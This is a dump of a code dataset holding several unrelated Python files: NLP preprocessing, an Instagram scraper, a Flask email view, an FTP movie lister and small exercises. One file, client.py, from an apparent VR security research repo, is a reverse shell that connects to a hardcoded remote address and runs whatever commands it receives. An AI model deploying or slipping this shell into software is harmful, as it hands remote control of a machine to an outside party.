blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 2
616
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
69
| license_type
stringclasses 2
values | repo_name
stringlengths 5
118
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringlengths 4
63
| visit_date
timestamp[us] | revision_date
timestamp[us] | committer_date
timestamp[us] | github_id
int64 2.91k
686M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 23
values | gha_event_created_at
timestamp[us] | gha_created_at
timestamp[us] | gha_language
stringclasses 213
values | src_encoding
stringclasses 30
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 2
10.3M
| extension
stringclasses 246
values | content
stringlengths 2
10.3M
| authors
listlengths 1
1
| author_id
stringlengths 0
212
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
b0501f9a2974e25181fca27f9db4e0b727435d7d
|
3ea56fbaaa5382b752a5a752eb911267f9d93756
|
/src/helpers/preprocessing.py
|
f75b61b02b3b9db7c70f5e0bfdae518216b529ac
|
[] |
no_license
|
dantodor/question-generation
|
888555b40dd0c2b0f081ea25b0cd481206bfa947
|
49d3404d5d984c987b233cecaac7213b814f17bb
|
refs/heads/master
| 2020-03-28T10:08:36.426920
| 2018-09-06T15:31:51
| 2018-09-06T15:31:51
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 13,547
|
py
|
import numpy as np
import string
# import tensorflow as tf
from nltk.tokenize import TreebankWordTokenizer, sent_tokenize
use_nltk = True
from helpers.loader import OOV, PAD, EOS, SOS
# def get_2d_spans(text, tokenss):
# spanss = []
# cur_idx = 0
# for tokens in tokenss:
# spans = []
# for token in tokens:
# if text.find(token, cur_idx) < 0:
# print("Tokens: {}".format(tokens))
# print("Token: {}\n Cur_idx: {}\n {}".format(token, cur_idx, repr(text)))
# raise Exception()
# cur_idx = text.find(token, cur_idx)
# spans.append((cur_idx, cur_idx + len(token)))
# cur_idx += len(token)
# spanss.append(spans)
# return spanss
#
#
# def get_word_span(context, wordss, start, stop):
# spanss = get_2d_spans(context, wordss)
# idxs = []
# for sent_idx, spans in enumerate(spanss):
# for word_idx, span in enumerate(spans):
# if not (stop <= span[0] or start >= span[1]):
# idxs.append((sent_idx, word_idx))
#
# assert len(idxs) > 0, "{} {} {} {}".format(context, spanss, start, stop)
# return idxs[0], (idxs[-1][0], idxs[-1][1] + 1)
def lookup_vocab(words, vocab, context=None, ans_tok_pos=None, do_tokenise=True, append_eos=False, context_as_set=False, copy_priority=False, asbytes=True, smart_copy=True, find_all=False ):
ids = []
decoded_context = [w.decode() if asbytes else w for w in tokenise(context)] if context is not None else []
words = [w.decode() if asbytes else w for w in tokenise(words)] if do_tokenise else [w.decode() if asbytes else w for w in words]
if context_as_set:
context_set = sorted(set(decoded_context))
for w in words:
# Use a few heuristics to decide where to copy from
if find_all:
this_ids=[]
if context is not None and not context_as_set and w in decoded_context:
indices = [i+len(vocab) for i, x in enumerate(decoded_context) if x == w]
this_ids.extend(indices)
if context is not None and context_as_set and w in context_set:
this_ids.append(len(vocab) + context_set.index(w))
if w in vocab.keys():
this_ids.append(vocab[w])
if len(this_ids) ==0 :
this_ids.append(vocab[OOV])
ids.append(this_ids)
elif copy_priority and smart_copy:
if context is not None and not context_as_set and w in decoded_context:
if decoded_context.count(w) > 1 and ans_tok_pos is not None:
# Multiple options, either pick the one that flows from previous, or pick the nearest to answer
if len(ids) > 0 and ids[-1]>=len(vocab) and len(decoded_context)>=ids[-1]-len(vocab)+2 and decoded_context[ids[-1]-len(vocab)+1] == w:
copy_ix = ids[-1]-len(vocab)+1
else:
indices = [i for i, x in enumerate(decoded_context) if x == w]
distances = [abs(ix-ans_tok_pos) for ix in indices]
copy_ix=indices[np.argmin(distances)]
else:
copy_ix = decoded_context.index(w)
ids.append(len(vocab) + copy_ix)
elif context is not None and context_as_set and w in context_set:
ids.append(len(vocab) + context_set.index(w))
elif w in vocab.keys():
ids.append(vocab[w])
else:
ids.append(vocab[OOV])
# Copy using first occurence
elif copy_priority:
if context is not None and not context_as_set and w in decoded_context:
ids.append(len(vocab) + decoded_context.index(w))
elif context is not None and context_as_set and w in context_set:
ids.append(len(vocab) + context_set.index(w))
# print(len(context_set), len(vocab) + context_set.index(w))
elif w in vocab.keys():
ids.append(vocab[w])
else:
ids.append(vocab[OOV])
# Shortlist priority
else:
if w in vocab.keys():
ids.append(vocab[w])
elif context is not None and not context_as_set and w in decoded_context:
if smart_copy and decoded_context.count(w) > 1 and ans_tok_pos is not None:
# Multiple options, either pick the one that flows from previous, or pick the nearest to answer
if len(ids) > 0 and ids[-1]>=len(vocab) and len(decoded_context)>=ids[-1]-len(vocab)+2 and decoded_context[ids[-1]-len(vocab)+1] == w:
copy_ix = ids[-1]-len(vocab)+1
else:
indices = [i for i, x in enumerate(decoded_context) if x == w]
distances = [abs(ix-ans_tok_pos) for ix in indices]
copy_ix=indices[np.argmin(distances)]
else:
copy_ix = decoded_context.index(w)
ids.append(len(vocab) + copy_ix)
elif context is not None and context_as_set and w in context_set:
ids.append(len(vocab) + context_set.index(w))
# print(len(context_set), len(vocab) + context_set.index(w))
else:
ids.append(vocab[OOV])
if append_eos:
ids.append(vocab[EOS] if not find_all else [vocab[EOS]])
if not find_all:
return np.asarray(ids, dtype=np.int32)
else:
return ids
# def find_start(haystack, key):
# haystack = [w.decode() for w in haystack]
# key = [w.decode() for w in key]
# expanded = [haystack[i:i+len(key)] for i in range(0,len(haystack)-len(key)+1)]
#
# if key in expanded:
# return expanded.index(key)
# else:
# # TODO: handle this error - it shouldn't arise if the dataset is well formed and correctly tokenised
# print(haystack)
# print(key)
# return expanded.index(key)
def tokenise(text, asbytes=True, append_eos=False):
text = text.decode() if asbytes else text
if use_nltk:
sents = [s for s in sent_tokenize(text)]
tokens = [tok.lower() for sent in sents for tok in TreebankWordTokenizer().tokenize(sent)]
else:
for char in string.punctuation+'()-–':
text = text.replace(char, ' '+char+' ')
tokens = text.lower().split(' ')
tokens = [w.encode() if asbytes else w for w in tokens if w.strip() != '']
if append_eos:
tokens.append(EOS.encode() if asbytes else EOS)
# tokens = np.asarray(tokens)
# return np.asarray(tokens)
return tokens
def char_pos_to_word(text, tokens, char_pos, asbytes=True):
ix=0
text=text.decode() if asbytes else text
if use_nltk:
sents = [s for s in sent_tokenize(text)]
spans = [[s for s in TreebankWordTokenizer().span_tokenize(sent)] for sent in sents]
# lens = [len(sent)+1 for sent in sents]
offsets = []
for i,sent in enumerate(sents):
offsets.append(text.find(sent, offsets[i-1]+len(sents[i-1]) if i>0 else 0)) # can we do this faster?
spans = [(span[0]+offsets[i], span[1]+offsets[i]) for i,sent in enumerate(spans) for span in sent]
# print(char_pos)
for ix,s in enumerate(spans):
# print(s, tokens[ix])
if s[1] > char_pos:
return ix
print('couldnt find the char pos via nltk')
print(text, char_pos, len(text))
else:
tokens = [t.decode() for t in tokens]
if char_pos>len(text):
print('Char pos doesnt fall within size of text!')
for t,token in enumerate(tokens):
for char in token:
ix = text.find(char, ix)
ix += 1
if ix >= char_pos:
return t
print('couldnt find the char pos')
print(text, tokens, char_pos, len(text))
# Filter a complete context down to the sentence containing the start of the answer span
def filter_context(ctxt, char_pos, window_size=0, max_tokens=-1):
sents = [s for s in sent_tokenize(ctxt)]
spans = [[s for s in TreebankWordTokenizer().span_tokenize(sent)] for sent in sents]
# lens = [len(sent)+1 for sent in sents]
offsets = []
for i,sent in enumerate(sents):
# print(ctxt.find(sent, offsets[i-1]+len(sents[i-1]) if i>0 else 0))
# print(len(sents[i-1]) if i>0 else 0)
# print(offsets[i-1] if i>0 else 0)
# print(offsets[i-1]+len(sents[i-1]) if i>0 else 0)
offsets.append(ctxt.find(sent, offsets[i-1]+len(sents[i-1]) if i>0 else 0)) # can we do this faster?
spans = [[(span[0]+offsets[i], span[1]+offsets[i]) for span in sent] for i,sent in enumerate(spans) ]
for ix,sent in enumerate(spans):
# print(sent[0][0], sent[-1][1], char_pos)
if char_pos >= sent[0][0] and char_pos < sent[-1][1]:
start=max(0, ix-window_size)
end = min(len(sents)-1, ix+window_size)
# print(start, end, start, offsets[start])
# new_ix=char_pos-offsets[start]
# print(new_ix)
# print(" ".join(sents[start:end+1])[new_ix:new_ix+10])
flat_spans=[span for sen in spans for span in sen]
if max_tokens > -1 and len([span for sen in spans[start:end+1] for span in sen]) > max_tokens:
for i,span in enumerate(flat_spans):
if char_pos < span[1]:
tok_ix =i
# print(span, char_pos)
break
start_ix = max(spans[start][0][0], flat_spans[max(tok_ix-max_tokens,0)][0])
end_ix = min(spans[end][-1][1], flat_spans[min(tok_ix+max_tokens, len(flat_spans)-1)][1])
# if len(flat_spans[start_tok:end_tok+1]) > 21:
# print(start_tok, end_tok, tok_ix)
# print(flat_spans[tok_ix])
# print(flat_spans[start_tok:end_tok])
# print(ctxt[flat_spans[start_tok][0]:flat_spans[end_tok][1]])
return ctxt[start_ix:end_ix], char_pos-start_ix
else:
return " ".join(sents[start:end+1]), char_pos - offsets[start]
print('couldnt find the char pos')
print(ctxt, char_pos, len(ctxt))
def filter_squad(data, window_size=0, max_tokens=-1):
filtered=[]
for row in data:
filt_ctxt,new_ix = filter_context(row[0],row[3], window_size, max_tokens)
filtered.append( (filt_ctxt, row[1],row[2],new_ix) )
return filtered
def process_squad_context(vocab, context_as_set=False):
def _process_squad_context(context):
# print(context)
# print(tokenise(context))
context_ids = lookup_vocab(context, vocab, context=context, append_eos=True, context_as_set=context_as_set, copy_priority=False)
context_copy_ids = lookup_vocab(context, vocab, context=context, append_eos=True, context_as_set=True, copy_priority=True)
context_set = set([w.decode() for w in tokenise(context)])
context_len = np.asarray(len(context_ids), dtype=np.int32)
context_vocab_size = np.asarray(len(context_set) if context_as_set else len(context_ids), dtype=np.int32)
res = [tokenise(context,append_eos=True), context_ids, context_copy_ids, context_len, context_vocab_size]
return res
return _process_squad_context
def process_squad_question(vocab, max_copy_size, context_as_set=False, copy_priority=False, smart_copy=True, latent_switch=False):
def _process_squad_question(question, context, ans_loc):
ans_tok_pos=char_pos_to_word(context, tokenise(context), ans_loc)
question_ids = lookup_vocab(question, vocab, context=context, ans_tok_pos=ans_tok_pos, append_eos=True, context_as_set=context_as_set, copy_priority=copy_priority, smart_copy=smart_copy)
question_len = np.asarray(len(question_ids), dtype=np.int32)
if latent_switch:
all_ids = lookup_vocab(question, vocab, context=context, ans_tok_pos=ans_tok_pos, append_eos=True, context_as_set=context_as_set, copy_priority=copy_priority, smart_copy=smart_copy, find_all=True)
# print(all_ids)
question_oh = np.asarray([np.sum(np.eye(len(vocab)+max_copy_size, dtype=np.float32)[ids], axis=0) for ids in all_ids], dtype=np.float32)
# print(np.shape(np.eye(len(vocab)+max_copy_size, dtype=np.float32)[all_ids[0]]))
# print(all_ids)
# print(np.shape(question_oh))
# exit()
else:
question_oh = np.eye(len(vocab)+max_copy_size, dtype=np.float32)[question_ids]
return [tokenise(question,append_eos=True), question_ids, question_oh, question_len]
return _process_squad_question
def process_squad_answer(vocab, context_as_set=False):
def _process_squad_answer(answer, answer_pos, context):
answer_ids = lookup_vocab(answer, vocab, context=context, append_eos=False, context_as_set=context_as_set)
answer_len = np.asarray(len(answer_ids), dtype=np.int32)
max_len = np.amax(answer_len)
answer_token_pos=np.asarray(char_pos_to_word(context, tokenise(context), answer_pos), dtype=np.int32)
answer_locs = np.arange(answer_token_pos, answer_token_pos+max_len, dtype=np.int32)
return [tokenise(answer,append_eos=False), answer_ids, answer_len, answer_locs]
return _process_squad_answer
|
[
"tomhosking@gmail.com"
] |
tomhosking@gmail.com
|
e1a1cca35ab531ef4ab7f16081728f13d3af2a8f
|
71ac26b94862581a50ed859be89724ac01ee3c88
|
/main.py
|
e60973be089a376fd96f6a3b061eedfd3d236246
|
[
"Apache-2.0"
] |
permissive
|
anderct105/va-questionnaire-3d
|
c7318b97b34fb876f3af7f72813806c26d737cce
|
a95650703e650c4c0640ab22d4db325799f15e70
|
refs/heads/main
| 2023-03-20T03:31:27.120751
| 2021-03-18T14:55:24
| 2021-03-18T14:55:24
| 326,024,322
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,443
|
py
|
"""
Author: Ander Cejudo
Github: https://github.com/anderct105/va-questionnaire-3d
"""
from utils.CargarCuestionario import CargarCuestionario
from utils.CargarEmbedding import CargarEmbedding
from utils.Preprocesar import Preprocesar
from utils.RepresentarEmbedding import RepresentarEmbedding
def menu():
with open('banner.txt','r') as f:
text = f.read()
f.close()
print(text)
print("Which questions do you want to load?")
print("\t1. All the questions in the questionnaire")
print("\t2. All the questions present in Adult")
print("\t3. All the questions present in Child")
print("\t4. All the questions present in Neonate")
print("\t0. Finish")
try:
option = int(input("Select one between 0-4: "))
if option < 0 or option > 4:
raise Exception
except:
print("Not a valid value!")
exit(1)
return option
def load_questions(option):
try:
if option == 0:
print("Bye!")
exit(0)
elif option == 1:
questions = CargarCuestionario('./data/FullInstrument4-3-13.xls', hoja='Master', columna='question')()[2:]
elif option == 2:
questions = CargarCuestionario('./data/AdultQuestions.txt')(formato='txt')
elif option == 3:
questions = CargarCuestionario('./data/ChildQuestions.txt')(formato='txt')
else:
questions = CargarCuestionario('./data/NeonateQuestions.txt')(formato='txt')
except IOError as exc:
print(exc)
print("The data could not be found, make sure that you downloaded the data folder from the repo.")
exit(1)
return questions
# Load questions
option = menu()
questions = load_questions(option)
# Preprocess the questions (lower, tokenize...)
questions_pre, _ = Preprocesar(questions)()
# Get doc embedding of each question, the Glove in the repo is 50 dimensional
glove = CargarEmbedding('./glove.txt').loadGloveModel()
questions_pre = RepresentarEmbedding(questions_pre)(glove)
# Save the questions and the embeddings in the corresponding format to load them in projector.tensorflow.org
print("Saving the results in questions_emb.tsv and questions_meta.tsv")
out_questions_emb = open('./out/questions_emb.tsv', 'w', encoding='utf-8')
out_questions_meta = open('./out/questions_meta.tsv', 'w', encoding='utf-8')
for i, emb in enumerate(questions_pre):
out_questions_meta.write(questions[i] + '\n')
out_questions_emb.write('\t'.join([str(x) for x in emb]) + '\n')
out_questions_meta.flush(); out_questions_emb.flush()
out_questions_meta.close(); out_questions_emb.close()
|
[
"anderct105@gmail.com"
] |
anderct105@gmail.com
|
b51c245b608cb68020be7de643b065f7e762282f
|
dde099db439abfca01f26f3508ea0b4d46e32781
|
/market_maker/utils/errors.py
|
f05690f058f7e6cfee91bd2f2ebf1116cd197c27
|
[
"Apache-2.0"
] |
permissive
|
BitMEX/sample-market-maker
|
31f01804493bf2a19809bf58eaa175275d0a5d1a
|
96e81afba02badf65451286a610c584187860a09
|
refs/heads/master
| 2023-05-27T15:08:57.706481
| 2023-05-24T08:02:34
| 2023-05-24T08:02:34
| 22,843,158
| 1,722
| 980
|
Apache-2.0
| 2023-05-24T08:02:36
| 2014-08-11T15:03:37
|
Python
|
UTF-8
|
Python
| false
| false
| 138
|
py
|
class AuthenticationError(Exception):
pass
class MarketClosedError(Exception):
pass
class MarketEmptyError(Exception):
pass
|
[
"samuel.trace.reed@gmail.com"
] |
samuel.trace.reed@gmail.com
|
01c30bb4de79bdd220d19d24afc4f77b0c35af30
|
916e5893558d1ae867d9973f8944bbdd654e99c0
|
/InstagramAPI.py
|
b7c03b1b0466d0e757d822e46fb9edff1beab91f
|
[] |
no_license
|
behnazeslami/Python_InstagramAPI
|
2de2cb32776cd3889aab7669c900e3f4ed304993
|
72bc5e0d8678f3b56d1f47fee7a787c1bfc9db61
|
refs/heads/main
| 2023-08-05T06:28:35.562588
| 2021-09-20T18:37:32
| 2021-09-20T18:37:32
| 408,556,651
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 929
|
py
|
# This code is written by Behnaz Eslami - behnazeslami30@gmail.com
import requests
import time
import json
arr = []
end_cursor = '' # empty for the 1st page
tag = 'russia' # your tag
page_count = 5 # desired number of pages
for i in range(0, page_count):
url = "https://www.instagram.com/explore/tags/{0}/?__a=1&max_id={1}".format(tag, end_cursor)
r = requests.get(url)
data = json.loads(r.text)
end_cursor = data['graphql']['hashtag']['edge_hashtag_to_media']['page_info'][
'end_cursor'] # value for the next page
edges = data['graphql']['hashtag']['edge_hashtag_to_media']['edges'] # list with posts
for item in edges:
arr.append(item['node'])
time.sleep(2) # insurence to not reach a time limit
print(end_cursor) # save this to restart parsing with the next page
with open('posts.json', 'w') as outfile:
json.dump(arr, outfile) # save to json
|
[
"noreply@github.com"
] |
behnazeslami.noreply@github.com
|
ff505e8d74891a59f7c13c21d9290044384e1e23
|
50019debbf18849495541bba031e48520d15bc37
|
/webarc/main/views.py
|
e70001094fda4d0b1a16bcfd2993d0655ad95b9b
|
[] |
no_license
|
INFO253-FL2017/assignment-2-leon-lee-jl
|
cbf5500ddc3fce0612371b8f4a6fd9136b1aa669
|
6dd2b5800ab25e1a62bd4cc3406e48342e6a8192
|
refs/heads/master
| 2021-07-11T14:57:57.398622
| 2017-10-16T13:02:16
| 2017-10-16T13:02:16
| 104,949,605
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,051
|
py
|
from flask import render_template, request, jsonify
from flask import Blueprint
import requests
from webarc import app
main_blueprint = Blueprint('main', __name__,)
@main_blueprint.route('/')
@main_blueprint.route('/index')
def index():
return render_template('index.html')
@main_blueprint.route('/about')
def about():
return render_template('about.html')
@main_blueprint.route('/contact')
def contact():
return render_template('contact.html')
@main_blueprint.route('/send-email', methods=['POST'])
def send_email():
post_data = request.json
a = requests.post(
"https://api.mailgun.net/v3/" + app.config['MG_DOMAIN'] + "/messages",
auth=("api", app.config['MG_KEY']),
data={"from": "Blogger User " + post_data['name']
+"<" + post_data['email'] + ">",
"to": [app.config['RECIPIENT']],
"subject": post_data['subject'],
"text": post_data['message']})
response = {
'status': a.status_code
}
return jsonify(**response)
|
[
"leon.lee@berkeley.edu"
] |
leon.lee@berkeley.edu
|
5989ffeadbcb72d4d1597d097fc8e2f8a3c4fa19
|
317b42f142034defeeba00ca6a50efd083f9cf61
|
/app/core/migrations/0004_recipe.py
|
6bdc83323cdd0c4db749d8cf51c8a0b08353e789
|
[
"MIT"
] |
permissive
|
shaunbevan/recipe-app-api
|
dee79e116873c5882e8759d0cc59680b38f3ea94
|
30727efce633b8289523ee1ff336cbfa77d5321d
|
refs/heads/main
| 2023-02-25T15:08:41.955208
| 2021-02-03T04:47:53
| 2021-02-03T04:47:53
| 333,582,412
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,350
|
py
|
# Generated by Django 3.1.5 on 2021-01-31 02:46
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
("core", "0003_ingredient"),
]
operations = [
migrations.CreateModel(
name="Recipe",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
("title", models.CharField(max_length=255)),
("time_minutes", models.IntegerField()),
("price", models.DecimalField(decimal_places=2, max_digits=5)),
("link", models.CharField(blank=True, max_length=255)),
("ingredients", models.ManyToManyField(to="core.Ingredient")),
("tags", models.ManyToManyField(to="core.Tag")),
(
"user",
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
to=settings.AUTH_USER_MODEL,
),
),
],
),
]
|
[
"tbevan@gmail.com"
] |
tbevan@gmail.com
|
162d0c3416325f0b52160d717600c38d7ea8a43f
|
c9563e0dacb5cc19fe5ea42eab858b9c7cbbf1f0
|
/Part2/classes.py
|
892b3d00d0991ca20a90df1edadc686ee4c3b0a0
|
[
"Unlicense"
] |
permissive
|
Torkvamedo/smx
|
0f06fcdfc017ad0764592a44da9f558fe58d079c
|
a5aef4f430f56ac67100c505902f55e18fba5978
|
refs/heads/master
| 2021-01-09T20:30:46.439532
| 2017-06-27T17:18:15
| 2017-06-27T17:18:15
| 81,243,375
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,880
|
py
|
class Heroes():
'''Class to create Heroes of our game'''
def __init__(self, name, level, race):
"""initiate our hero"""
self.name = name
self.level = level
self.race = race
self.health = 100
def show_hero(self):
"""print all parameters of this hero"""
discription = (self.name + 'level is ' + str(self.level) + ' Race is '+ self.race + 'health ' + str(self.health)).title()
print(discription)
def lvlup(self):
"""upgrade lvl of hero"""
self.level += 1
def move(self):
"""start moving """
print("Hero " + self.name + "start moving")
# -------------------------------------------------------------------------------
class super_hero(Heroes):
"""Class to create Super Hero"""
def __init__(self,name , level , race, magic_level):
"""initiate our super hero """
super().__init__(name, level, race) # инициализация класса Heroes и передача значений
self.magic_level = magic_level
self.magic = 100
def make_magic(self):
"""use magic"""
self.magic -= 10
def show_hero(self):
discription = (self.name + 'level is ' + str(self.level) + ' Race is '+ self.race + 'health ' + str(self.health
+ 'magic is: '+ self.magic)).title()
print(discription)
# --------------MAIN-----------------------
my_hero1 = Heroes("Raynor ", 5 ," Elf ")
my_hero2 = Heroes("Jax ", 4, " Human ")
my_hero1.show_hero()
my_hero2.move()
my_hero1.lvlup()
my_hero1.show_hero()
my_hero = Heroes("Vurdalac ", 10 , " undead ")
my_superher = super_hero (" Alios ", 90, " High Elf", 10 )
my_hero.lvlup()
my_hero.move()
my_hero.show_hero()
my_superher.magic
my_superher.lvlup()
my_superher.magic_level
my_superher.make_magic()
my_superher.race
my_superher.
|
[
"campfireinsnow@gmail.com"
] |
campfireinsnow@gmail.com
|
67b6eac4b839bee329e73be49044b9c3f51e22de
|
9bc26e56a4a797857bc5ea68abf93af0887c8dd0
|
/remote.py
|
0adea86778ddd9c9982cea7d1d976875dd95e88f
|
[] |
no_license
|
aymanim/movielocal
|
6a8f38191cb9d8cbb52b5fee740bb5c2f812fadc
|
a6c450cb6ceba08187795f32dc0598842f2895dc
|
refs/heads/master
| 2021-01-10T19:42:22.726799
| 2012-08-19T02:37:04
| 2012-08-19T02:37:04
| 5,467,789
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,731
|
py
|
import ftputil
import moviesearch
import ftp_settings
import pickle
import os
import datetime
import time
import re
import threading
NUM_THREADS = 12
FILE_SIZE_THRESHOLD = 500 * 1024 * 1024
valid_movie_extensions = ["wmv", "avi", "mpeg", "mpg4", "mkv", "mp4"]
common_words = ["the", "a", "of", "and"]
movie_database_url = "http://moviesearchengine.org"
extensions = {}
cache_file = "moviecache"
ftp = None
def ftp_listing_callback(listing):
# parse the listing
# 0 - permissions
# 4 - size
# 8 to end - name
tokenized = listing.split()
name = " ".join(tokenized[8:len(tokenized)])
if(tokenized[0][0] == 'd'):
print "---"
else:
blast = name.split(".")
extension = blast[-1]
extensions[extension] = "1"
movie_name = " ".join(blast[0:-1])
print "FILE ",movie_name
names = movie_search(movie_name)
for val, key in names.iteritems():
flag = 0
print "checking ", val
for words in val.replace(":"," ").replace(","," ").split():
if not words.lower() in movie_name.lower():
flag = 1
break
if flag == 0:
print "found it ", val, key[0], key[1]
print "====="
global_movie_list = []
global_resolved_list = []
def cleanname(name):
remove_year = re.sub(r'[0-9][0-9][0-9][0-9]', ' ', name)
remove_year = re.sub(r'\[[\w]*\]', ' ', remove_year)
split_name = remove_year.lower().replace(":"," ").replace(","," ").replace("-"," ").replace("_", " ").split()
for word in common_words:
try:
split_name.remove(word)
except:
pass
return split_name
def name_resolution(movie_name):
names = moviesearch.movie_search(movie_name)
valid_candidate = None
max_index = 0
max_overlap = 0
cleaned_movie_name = cleanname(movie_name)
# get possible movie names
for val, key in names.iteritems():
flag = 0
cleaned_val = cleanname(val)
overlap = len(set(cleaned_movie_name).intersection(set(cleaned_val)))
#print "checking ", val, " -- ", overlap
if overlap > max_overlap:
#print " seems to work [", overlap, "]"
valid_candidate = [val, key[0]]
max_overlap = overlap
if not valid_candidate is None:
#print "Found it - ", valid_candidate
#print valid_candidate
return valid_candidate
else:
#print "No valid candidate"
#print "non"
return ["",""]
def ftp_traverse(directory):
print "ftp_traverse", directory
for element in ftp.listdir(directory):
path_to_element = directory + "\/" + element
if ftp.path.isfile(path_to_element):
# only add valid videos
if(element.split(".")[-1] in valid_movie_extensions) and ftp.path.getsize(path_to_element) > FILE_SIZE_THRESHOLD:
print "adding to list", element
global_movie_list.append(element)
else:
print "cd ", element
ftp_traverse(directory + "\/" + element)
def create_movie_list():
global ftp
ftp_server = ftp_settings.FTP_SERVER
ftp_username = ftp_settings.FTP_USERNAME
ftp_password = ftp_settings.FTP_PASSWORD
ftp_movie_directory = "Video\/Movies"
print "Connecting to ", ftp_server
# Connect to the server
ftp = ftputil.FTPHost(ftp_server, ftp_username, ftp_password)
#ftp.listdir(ftp_movie_directory)
ftp_traverse(ftp_movie_directory)
file = open(cache_file, "w")
pickle.dump(global_movie_list, file)
def multi_thread_name_resolve(start, end):
for i in range(start, end):
name = " ".join(global_movie_list[i].split(".")[0:-1])
result = name_resolution(name)
global_resolved_list.append([global_movie_list[i], result[0], result[1]])
def progress_bar():
prev = -2
while len(global_movie_list) > len(global_resolved_list):
if prev < len(global_resolved_list):
print "\r", len(global_resolved_list) , " of ", len(global_movie_list)
prev = len(global_resolved_list)
# check to see if the cache file exists.
# if it does and is recent enough
try:
file = open(cache_file, "r")
#days since last modified
a = datetime.timedelta(seconds=time.mktime(time.localtime()) - os.path.getmtime(cache_file))
if a.days < 2:
print "Cache is recent enough"
global_movie_list = pickle.load(file)
else:
print "Recreating cache ..."
create_movie_list()
except IOError:
print "Creating cache ..."
create_movie_list()
block_size = len(global_movie_list) / NUM_THREADS
threadarray = []
for i in range(0, NUM_THREADS):
start = i * block_size
end = start + block_size
print "Setting up thread ", i, "start ", start, "end ", end
t = threading.Thread(target=multi_thread_name_resolve, args=(start, end))
t.start()
threadarray.append(t)
progressthread = threading.Thread(target=progress_bar)
progressthread.setDaemon(True)
progressthread.start()
for t in threadarray:
t.join()
print "Done with the threads "
for stuff in global_resolved_list:
print stuff[0], " | ", stuff[1], " | ", stuff[2]
|
[
"amplenerd@gmail.com"
] |
amplenerd@gmail.com
|
cd4b815067016405eb93fe5c654761083c4f61b4
|
4cc3060aa8992c15e01f00a0452d8ebf99dd920a
|
/Attacks/Vive-Attack-Console/client.py
|
f51fe5ac1503a83fbc6f643d6ebcb8a1350500b9
|
[
"MIT"
] |
permissive
|
BiTLab-BaggiliTruthLab/VR4Sec
|
368318956693d4a0759500a5d710e834695b14ee
|
2547afcd064b6f765f4003b90da2cb618d12bc62
|
refs/heads/master
| 2023-03-16T11:52:24.369773
| 2019-08-14T16:38:24
| 2019-08-14T16:38:24
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 610
|
py
|
import os, socket, subprocess
s = socket.socket()
host = '172.19.38.76'
port = 9999
s.connect((host, port))
while True:
data = s.recv(1024)
if data[:2].decode("utf-8") == 'cd':
os.chdir(data[3:].decode("utf-8"))
if len(data) > 0:
cmd = subprocess.Popen(data[:].decode("utf-8"), shell = True, stdout = subprocess.PIPE, stderr = subprocess.PIPE, stdin = subprocess.PIPE)
output_bytes = cmd.stdout.read() + cmd.stderr.read()
output_str = str(output_bytes, "utf-8")
s.send(str.encode(output_str + str(os.getcwd()) + '> '))
print(output_str)
s.close()
|
[
"peter.gromkowski@gmail.com"
] |
peter.gromkowski@gmail.com
|
da40fd8aa1c499ade27540e22d5d1e015b892fc8
|
24d8cf871b092b2d60fc85d5320e1bc761a7cbe2
|
/eXe/rev2735-2828/left-trunk-2828/twisted/test/test_assertions.py
|
55df7afafc27ce116c45e80d60de6ecfab5867d6
|
[
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
joliebig/featurehouse_fstmerge_examples
|
af1b963537839d13e834f829cf51f8ad5e6ffe76
|
1a99c1788f0eb9f1e5d8c2ced3892d00cd9449ad
|
refs/heads/master
| 2016-09-05T10:24:50.974902
| 2013-03-28T16:28:47
| 2013-03-28T16:28:47
| 9,080,611
| 3
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 669
|
py
|
from twisted.trial import unittest
from twisted.python import failure
class Assertions(unittest.TestCase):
def testExceptions(self):
exc = self.assertRaises(ZeroDivisionError, lambda: 1/0)
assert isinstance(exc, ZeroDivisionError), "ZeroDivisionError instance not returned"
for func in [lambda: 1/0, lambda: None]:
try:
self.assertRaises(ValueError, func)
except unittest.FailTest:
pass
except:
raise unittest.FailTest("FailTest not raised", failure.Failure().getTraceback())
else:
raise unittest.FailTest("FailTest not raised")
|
[
"joliebig@fim.uni-passau.de"
] |
joliebig@fim.uni-passau.de
|
ecfafbddea6cb8a1005d0e27ba8a10b2fe944d12
|
f5a3f81aeb15b767ae4582842facc05310f92fc7
|
/searching/sequential/sequential.py
|
770821173a6a21c0b74b51ace8eb768026ecfedf
|
[] |
no_license
|
muhallan/algorithms
|
edc021b749d5462cf61724257100333986be20bc
|
c0eef989918f071a04f90bc56e6f6c609bd9c83e
|
refs/heads/master
| 2021-06-26T15:38:27.678403
| 2019-06-21T06:28:46
| 2019-06-21T06:28:46
| 147,846,616
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 388
|
py
|
def sequential_search(list_to_search, item):
found = False
index = 0
while index < len(list_to_search) and not found:
if list_to_search[index] == item:
found = True
else:
index += 1
return found
# testing
even_nums = [2, 4, 6, 8, 10]
# find 5
print(sequential_search(even_nums, 5))
# find 4
print(sequential_search(even_nums, 4))
|
[
"allan.muhwezi@andela.com"
] |
allan.muhwezi@andela.com
|
2c081fceed78b55a7d89a0b92c61ad041dba4e70
|
5c5ea66184e1b62fa05a40168e5f8e6ccb7ac958
|
/app/review/urls.py
|
